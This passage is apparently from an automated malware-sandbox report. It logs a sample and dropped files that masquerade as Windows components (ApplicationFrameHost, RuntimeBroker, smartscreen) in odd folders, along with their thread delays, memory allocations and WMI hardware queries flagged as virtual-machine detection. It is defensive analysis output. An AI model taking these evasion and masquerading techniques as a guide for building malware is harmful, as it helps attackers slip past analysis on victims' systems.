Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Music\ApplicationFrameHost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Memory allocated: 1310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Memory allocated: 1B330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Memory allocated: 15B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Memory allocated: 1AFB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Memory allocated: B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Memory allocated: 1A800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Memory allocated: 1180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Memory allocated: 1AC70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Memory allocated: 1150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Memory allocated: 1B0A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Memory allocated: 13E0000 memory reserve \| memory write watch
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Memory allocated: 1B110000 memory reserve \| memory write watch
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Memory allocated: 3500000 memory reserve \| memory write watch
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Memory allocated: 1B500000 memory reserve \| memory write watch
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Memory allocated: 15E0000 memory reserve \| memory write watch
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Memory allocated: 1B5A0000 memory reserve \| memory write watch
Source: C:\Recovery\smartscreen.exe	Memory allocated: 2750000 memory reserve \| memory write watch
Source: C:\Recovery\smartscreen.exe	Memory allocated: 1A940000 memory reserve \| memory write watch
Source: C:\Recovery\smartscreen.exe	Memory allocated: 8C0000 memory reserve \| memory write watch
Source: C:\Recovery\smartscreen.exe	Memory allocated: 1A620000 memory reserve \| memory write watch
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Memory allocated: 14D0000 memory reserve \| memory write watch
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Memory allocated: 1B060000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 599718
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\smartscreen.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\smartscreen.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Window / User API: threadDelayed 1314	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Window / User API: threadDelayed 797	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Window / User API: threadDelayed 362	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Window / User API: threadDelayed 365	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Window / User API: threadDelayed 362	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Window / User API: threadDelayed 363	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8660	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5515
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5645
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4960
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5278
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4602
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8087
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5866
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4751
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6182
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6319
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Window / User API: threadDelayed 557
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Window / User API: threadDelayed 364
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	Window / User API: threadDelayed 363
Source: C:\Recovery\smartscreen.exe	Window / User API: threadDelayed 364
Source: C:\Recovery\smartscreen.exe	Window / User API: threadDelayed 367
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Window / User API: threadDelayed 360

Source: C:\Users\user\Desktop\cvXu2RR10n.exe TID: 7508	Thread sleep count: 1314 > 30	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe TID: 7508	Thread sleep count: 797 > 30	Jump to behavior
Source: C:\Users\user\Desktop\cvXu2RR10n.exe TID: 7444	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 8120	Thread sleep count: 362 > 30	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 8052	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 3804	Thread sleep count: 365 > 30	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 8148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe TID: 2868	Thread sleep count: 362 > 30	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe TID: 7192	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe TID: 10116	Thread sleep count: 363 > 30	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe TID: 7564	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep count: 8660 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9192	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep count: 5515 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9136	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep count: 5645 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9172	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep count: 4960 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9168	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8208	Thread sleep count: 5278 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9132	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460	Thread sleep count: 4602 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9196	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8852	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8548	Thread sleep count: 8087 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8636	Thread sleep count: 5184 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9204	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604	Thread sleep count: 5866 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8628	Thread sleep count: 4751 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9164	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8544	Thread sleep count: 6182 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8648	Thread sleep count: 6319 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9200	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 8528	Thread sleep count: 557 > 30
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 9676	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 9676	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 9676	Thread sleep time: -599718s >= -30000s
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 9484	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 8356	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe TID: 10228	Thread sleep count: 364 > 30
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe TID: 9388	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe TID: 10144	Thread sleep count: 363 > 30
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe TID: 9784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\smartscreen.exe TID: 10172	Thread sleep count: 364 > 30
Source: C:\Recovery\smartscreen.exe TID: 9672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\smartscreen.exe TID: 1660	Thread sleep count: 367 > 30
Source: C:\Recovery\smartscreen.exe TID: 10124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7892	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 9624	Thread sleep count: 360 > 30
Source: C:\Users\user\Music\ApplicationFrameHost.exe TID: 9576	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Music\ApplicationFrameHost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\Music\ApplicationFrameHost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Music\ApplicationFrameHost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\Music\ApplicationFrameHost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\smartscreen.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\smartscreen.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Music\ApplicationFrameHost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\cvXu2RR10n.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Music\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
